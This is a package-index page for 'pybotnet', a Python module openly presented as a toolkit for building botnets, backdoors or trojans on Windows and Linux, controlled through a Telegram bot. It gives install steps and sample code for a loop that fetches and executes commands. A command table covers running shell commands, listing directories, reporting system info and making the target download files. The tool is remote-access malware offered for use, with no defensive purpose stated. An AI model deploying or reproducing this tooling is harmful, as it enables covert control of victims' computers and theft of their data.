Skip to main content

A Python module for building botnet ,backdoor or trojan with Telegram control panel

Project description

pybotnet

A Python module for building [botnet ,backdoor or trojan] for windows and linux with Telegram control panel

Features:

  • get command from telegram and execute scripts
  • get command and send message by third party proxy
  • get target info
  • sleep source by Optional message
  • get ls (dirctory list)
  • export file to targets system (target download a link :) )
  • for more see commands table end of this page

See the TODO List if you want to help me <3

Requirements:

  • Python 3.6 or higher.
  • Telegram account
  • your account number ID (get it from @userinfobot)
  • telegram api token (Get it from the telegram botfather)

Usage:

pip install pybotnet
# this is sample_code.py 

from pybotnet import pybotnet
import time


# ! rename configs.py.sample to configs.py
# ! and edit configs.py data
from configs import TELEGRAM_TOKEN, ADMIN_CHAT_ID

# * if you compile code without shell: is_sheel=False
# * show_log: just for debugging
# * send_system_data: send system short info in bot messages

bot = pybotnet.PyBotNet(TELEGRAM_TOKEN, ADMIN_CHAT_ID,
                        show_log=True, send_system_data=True, is_shell=True)

delay = 10

while True:
    print('*'*100)
    bot.get_and_execute_scripts_by_third_party_proxy()
    time.sleep(delay)

Commmands:

Send this COMMANDs to your api bot in telegram, using the admin account.

If you want the command to run only on one system, write the MAC address of that system first, like: 66619484755211 get_info

COMMAND Sample DO THIS Minimum version required tested on
get_info get_info return system info 0.06 windows, linux
do_sleep <scconds> <message (Optional)> do_sleep 99999 hi, i see you! <if message != none : print(message) > ; time.sleep(seccond) 0.08 windows, linux
cmd <system command> cmd mkdir new_folder run system command in shell or cmd (Be careful not to give endless command like ping google.com -t in windows or ping google.com in linux) TODO:add timeout 0.07 windows, linux
ls <route> ls C:\ , ls /home Returns a list of folders and files in that path 0.09 windows, linux
export_file <download_link> export_file https://github.com/onionj/pybotnet/archive/refs/heads/master.zip target donwload this file and save to script path route 0.14 windows

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pybotnet-0.15.3.tar.gz (22.0 kB view hashes)

Uploaded Source

Built Distribution

pybotnet-0.15.3-py3-none-any.whl (20.9 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page